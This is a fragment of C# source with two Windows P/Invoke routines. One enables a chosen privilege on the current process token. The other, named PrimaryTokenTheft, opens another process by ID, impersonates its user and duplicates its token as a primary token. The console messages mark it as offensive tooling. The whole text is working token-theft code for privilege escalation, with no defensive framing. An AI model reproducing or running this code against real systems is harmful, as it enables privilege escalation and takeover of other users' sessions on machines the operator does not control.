public static bool AdjustTokenPrivilege(string priv) { try { Pinvoke.PTOKEN_PRIVILEGES tPriv; IntPtr hProc = Pinvoke.GetCurrentProcess(); IntPtr tHandle = IntPtr.Zero; if (Pinvoke.OpenProcessToken(hProc, Pinvoke.TOKEN_ADJUST_PRIVILEGES | Pinvoke.TOKEN_QUERY, ref tHandle)) { tPriv.Count = 1; tPriv.Luid = 0; tPriv.Attr = Pinvoke.SE_PRIVILEGE_ENABLED; Pinvoke.LookupPrivilegeValue(null, priv, ref tPriv.Luid); Pinvoke.PRIVILEGE_SET privs = new Pinvoke.PRIVILEGE_SET { Privilege = new Pinvoke.LUID_AND_ATTRIBUTES[1], Control = Pinvoke.PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1 }; privs.Privilege[0].Luid = tPriv.Luid; privs.Privilege[0].Attributes = Pinvoke.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED; bool privCheck; Pinvoke.PrivilegeCheck(tHandle, ref privs, out privCheck); if (!privCheck) { Console.WriteLine("[*] Trying to adjust token for privilege '{0}'!", priv); if (Pinvoke.AdjustTokenPrivileges(tHandle, false, ref tPriv, 0, IntPtr.Zero, IntPtr.Zero)) { Console.WriteLine("[+] Success adjusting privilege to '{0}'!", priv); return(true); } } else { Console.WriteLine("[+] Process token already have '{0}'!", priv); return(true); } } } catch (Exception ex) { throw ex; } Console.WriteLine("[-] Error adjusting privilege {0}", Marshal.GetLastWin32Error()); return(false); }
public static IntPtr PrimaryTokenTheft(int pid) { IntPtr PrimaryToken = new IntPtr(); IntPtr hProcess = Pinvoke.OpenProcess(Pinvoke.ProcessAccessFlags.QueryInformation, true, pid); if (hProcess != IntPtr.Zero) { IntPtr tokenHandle = new IntPtr(); if (Pinvoke.OpenProcessToken(hProcess, Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY | Pinvoke.TOKEN_QUERY, ref tokenHandle)) { if (Pinvoke.ImpersonateLoggedOnUser(tokenHandle)) { if (Pinvoke.DuplicateTokenEx(tokenHandle, Pinvoke.TOKEN_ADJUST_DEFAULT | Pinvoke.TOKEN_ADJUST_SESSIONID | Pinvoke.TOKEN_QUERY | Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY, IntPtr.Zero, 2, Pinvoke.TOKEN_TYPE.TokenPrimary, out PrimaryToken)) { Console.WriteLine("[+] Success duplicating primary token!"); return(PrimaryToken); } } } } Console.WriteLine("[-] Error impersonating process token! ({0})", Marshal.GetLastWin32Error()); return(IntPtr.Zero); }